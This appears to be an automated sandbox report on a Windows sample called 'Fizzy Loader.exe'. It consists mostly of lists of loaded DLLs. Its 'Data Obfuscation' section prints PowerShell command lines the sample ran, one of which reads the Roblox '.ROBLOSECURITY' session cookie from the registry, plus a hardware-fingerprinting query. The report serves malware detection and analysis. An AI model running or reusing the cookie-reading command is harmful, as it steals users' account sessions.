                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: devenum.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: devobj.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: msdmo.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: Fizzy Loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: Fizzy Loader.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Fizzy Loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                        Data Obfuscation

                        barindex
                        Suspicious powershell command line found
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
                        Source: Fizzy Loader.exeStatic PE information: 0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF848F400BD pushad ; iretd 0_2_00007FF848F400C1
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeCode function: 0_2_00007FF849114D59 pushad ; ret 0_2_00007FF849114D69
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848DFD2A5 pushad ; iretd 6_2_00007FF848DFD2A6
